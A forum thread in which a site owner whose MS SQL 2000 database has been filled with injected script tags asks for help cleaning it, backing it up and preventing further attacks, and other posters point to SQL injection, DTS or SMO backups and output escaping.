Hi

I have a ms sql 2000 db on my shared server. My site is getting hacked almost every alternate day. There are more then 500 asp pages and Its not possible for me to open every page and secure the user input.

Currently the hacker has appended some js script tag in all over my tables (I have more then 150 tables in the db). I do not have a backup at the moment so the only thing I can do is replace that js tag with NULL values.

Now Question:

1) Is there any function/query/stored procedure in MS SQL Server 2000 which would replace a value with another through out all the tables in my db?

2) Is there any script that I can use to keep a backup of my db? Currently my host charges $10 for one time backup. So I cant really afford to pay them that money everyday.

3) Also what do you suggest about avoiding my sites from being hacked.


Thanx

There are more then 500 asp pages and Its not possible for me to open every page and secure the user input.

Then you sir, have a problem. Both a hacker problem and a design problem.

why on gods given earth do you have 500 pages?

why on gods given earth do you have 500 pages?

Because my site is that big

I would doubt any website would need 500 pages, unless it was pure static content. You need to revise your design. What does all the 500 pages do? If they do something similar they should be loaded dynamically, not just slightly either. Have you looked into OOP?

In response to #2, if your hosting company allows you to connect SQL Enterprise Manager to their SQL Server (most do not), then you could use a DTS package to extract your data out. Alternatively, you could use ASP.Net and SQL Server Management Objects to create scripts for you. I'm afraid I'm unable to share the code for that, but you can find more info by doing a Google search for "sql server smo". SQLServerCentral.com has some good tutorials on this.

Regarding #3, this may be happening through SQL injection attacks. I recently helped another IT company to recover from such an attack. Again, a Google search on this topic will help you identify some of the possible holes in your site.

Good luck!

PHP has two functions you would want. htmlspecialchars and htmlentities. They do the same thing. What they do is strip the html or javascript or whatever else from the data they are given and convert it to a harmless equivalent. For example, it changes the '<' to &lt;.

However you also need a device to escape the SQL from other SQL. PHP has a mysql_real_escape_string, but that can only be used with an open mysql database connection. I would suggest as demtrom said, that you should google sql injection and figure out how to defend yourself from it. I'm unfamiliar with what it would require to escape MS SQL server SQL.